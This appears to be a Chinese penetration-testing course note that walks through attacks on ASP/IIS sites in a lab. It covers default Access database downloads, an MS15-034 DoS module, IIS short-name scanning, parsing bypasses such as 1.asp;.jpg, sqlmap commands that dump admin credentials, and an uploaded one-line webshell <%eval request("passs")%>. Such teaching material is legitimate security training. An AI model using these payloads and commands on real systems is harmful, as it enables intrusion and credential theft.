041-WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏

#知识点：

1、ASP-SQL注入-Access数据库
2、ASP-默认安装-数据库泄漏下载
3、ASP-IIS-CVE&短文件&解析&写入

演示案例：

➢ASP-默认安装-MDB数据库泄漏下载
➢ASP-中间件-CVE&短文件&解析&写权限
➢ASP-SQL注入-SQLMAP使用&ACCESS注入

#ASP-默认安装-MDB数据库泄漏下载

• 由于大部分ASP程序与ACCESS数据库搭建，但ACCESS无需连接
• 在==脚本文件中定义配置好数据库路径即用，不需要额外配置安装数据库==
• 提前固定好的数据库路径如默认未修改，
• 当攻击者知道数据库的完整路径，可远程下载后解密数据实现攻击。

1，打开虚拟机环境2003 企业版 32位 IIS 6.0 CN

2，右键我的电脑打开管理，选择Internet信息服务（IIS）→网站

3，选择对应的fyblogs_3.0 网站，查看分配的ip地址

4，通过其他主机访问该IP地址

5，成功访问后，通过访问对应下载路径，直接下载`#data.mdb文件

http://192.168.200.140:81**/database/%23data.mdb**

6，打开文件，发现其中==泄露用户名密码==等信息

遇到问题：打开网址不能在正常打开

解决：将属性中的ip地址重新分配即可

#ASP-中间件-CVE&短文件&解析&写权限

HTTP.SYS（CVE-2015-1635）

1、漏洞描述

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

2、影响版本

Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2

3、漏洞利用条件

安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本

4、漏洞复现

• msfconsole

  是==Metasploit Framework的命令行界面==，它是一个功能强大的渗透测试工具和漏洞利用框架。Metasploit Framework旨在帮助安全专业人员评估和测试计算机系统的安全性，包括发现漏洞、开发和执行攻击、获取远程访问权限等。

• use auxiliary/dos/http/ms15_034_ulonglongadd

  是Metasploit Framework中的一个辅助模块，用于执行针对MS15-034漏洞（也称为HTTP.sys远程代码执行漏洞）的拒绝服务（DoS）攻击。这个漏洞影响Windows操作系统中的HTTP堆栈，攻击者可以通过发送特制的HTTP请求导致**目标系统崩溃，从而实现拒绝服务攻击。**

• set rhosts xx.xx.xx.xx
  set rport xx
  run

IIS短文件

1、漏洞描述

此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。

2、漏洞成因:

为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3短文件名。在Windows下查看对应的短文件名,可以使用命令**dir /x**

3、应用场景：

后台路径获取，数据库文件获取，其他敏感文件获取等

python iis_shortname_scan.py [http://192.168.200.140:88/](http://192.168.200.140:88/)

• 选择对应的powereasy 网站，查看分配的ip地址
• 借助工具，输入执行语句和目标ip执行扫描
• 获取到对应的网站目录

4、利用工具：

https://github.com/lijiejie/IIS_shortname_Scanner

IIS文件解析

• IIS 6 解析漏洞→可以上传木马文件，以图片形式或文件夹形式替换格式

  • 1、该版本默认会将***.asp;.jpg** 此种格式的文件名，当成Asp解析

    

    

  

  • 2、该版本默认会将***.asp/目录下的所有文件当成Asp解析**。
    如：logo.asp;.jpg xx.asp/logo.jpg

    

  

  

• IIS 7.x 解析漏洞

  • 在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
    应用场景：配合文件上传获取Webshell

IIS写权限

• IIS<=6.0 目录权限开启写入，开启WebDAV，设置为允许
• 可以通过提交put包，进行写入文件（可置入木马，获得权限）
  参考利用：https://cloud.tencent.com/developer/article/2050105

#ASP-SQL注入-SQLMAP使用&ACCESS注入

1. ACCESS数据库无管理帐号密码，顶级架构为表名，列名（字段），数据，
2. 所以在注入猜解中一般采用字典猜解表和列再获取数据，猜解简单但又可能出现猜解不到的情况
3. Access数据库在当前安全发展中已很少存在，故直接使用SQLMAP注入，后续再说其他。

1.打开对应的UploadParsing网址，并使用其分配的IP进行访问

2.源码中，没有进行sql语句的过滤，直接拼接，造成有注入风险

• http://192.168.200.140:89**/Pic.asp?classid=3**

  

3.使用sqlmap工具进行sql注入

• G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐狸\gui_scan\sqlmap

• python sqlmap.py -u “” --tables //获取表名
  python sqlmap.py -u “” --cloumns -T admin //获取admin表名下的列名
  python sqlmap.py -u “” --dump -C “username,password” -T admin //获取表名下的列名数据

• python .\sqlmap.py -u “http://192.168.200.140:89/Pic.asp?classid=3” --tables

  • python .\\sqlmap.py: 启动 SQLMap 工具，使用 Python 解释器运行。

  • u "<http://192.168.200.140:89/Pic.asp?classid=3>": 指定目标 URL，即要测试的网站地址。在这个例子中，目标 URL 是 http://192.168.200.140:89/Pic.asp?classid=3。u 选项用于指定 URL。

  • -tables: 指定 SQLMap 工具执行的任务，这里是获取数据库中的所有表。-tables 选项用于请求表的信息。

  • 提示有注入点

    

• 它询问是否要使用常见的表存在性检查方法

  • do you want to use common table existence check? [Y/n/q] y

  • 选择要使用的常见表文件的提示。用户可以选择默认的常见表文件，也可以选择自定义的常见表文件。

  • 询问用户要设置多少个线程进行测试

  • please enter number of threads? [Enter for 1 (current)] 输入10

    

• python .[sqlmap.py](http://sqlmap.py/) -u “http://192.168.200.140:89/Pic.asp?classid=3” --columns -T admin

  • -columns: 这是 SQLMap 的一个选项，用于指示工具查找指定表的列。

  • T admin: 这是 SQLMap 的另一个选项，用于指定目标表的名称。在这里，它是 “admin” 表。

    

    

• python .[sqlmap.py](http://sqlmap.py/) -u “http://192.168.200.140:89/Pic.asp?classid=3” --dump -C “username,password” -T admin

  • -dump: 这是 SQLMap 的选项，用于指示工具从数据库中检索数据。

  • C "username,password": 这是 SQLMap 的选项，用于指定要检索的列的名称。在这里，它是 “username” 和 “password” 列。

  • 得出如下的用户名和密码

    

• 由于密码是MD5加密的

  使用解密解密出密码

  

  

4.使用IIS短目录或**目录扫描（7kbscan御剑版）**扫描找到后台登录页面

• python iis_shortname_scan.py http://192.168.200.140:89/

  • 扫描出一些目录

  • 一一进行访问在访问时发现：http://192.168.200.140:89/upfile.asp

  • 会跳转到后台登录页面：http://192.168.200.140:89**/Tcnet/Admin_Login.asp**

    

    

    

• 目录扫描（7kbscan御剑版）

  • 直接将目标地址写入

  • 选择对应的字典类型和显示结果

  • 发现有跳转的页面直接访问至后台

    

    

• 网站爬虫

  • 直接在网址检测中点击文件，查看目录和文件结构
  • 直接查看网站前端源码

5.登录后台页面

6.模拟漏洞上传测试（只需要了解后面还会讲）

• 分别开启burp和浏览器的代理和端口

  

  

• 上传普通的小的照片

  

  

  

  

• 进行抓包，将包中的有关文件路径的内容，拼接上去**/1.asp;.(可以将木马文件，替换为该格式)**

• 再次抓包

  

  

  

• 将照片路径替换为：192.168.126.131:89**/1.asp;.20235192154599715.png**

  • 发现可以被当成Asp正常解析

  • 在抓包的后面加上木马程序的内容**<%eval request(”passs”)%>**

    1. <% 和 %>: 这是ASP脚本中的定界符，用于标识服务器端代码的开始和结束。
    2. eval: 这是一个函数或操作符，用于执行动态生成的代码。在这里，它被用于执行后面括号中的内容。
    3. request("passs"): 这部分看起来是从请求中获取名为 “passs” 的参数的值。request 是用于获取请求参数的对象，而 “passs” 是参数的名称。

    总体来说，这段代码的作用是从请求中获取名为 “passs” 的参数的值，并使用 eval 函数执行它。这种构造可能导致安全风险，特别是如果用户能够控制传递给 “passs” 参数的内容。eval 的使用通常被认为是不安全的，因为它允许执行任意的动态代码，可能导致代码注入攻击。

  • 使用哥斯拉，利用木马文件获得权限成功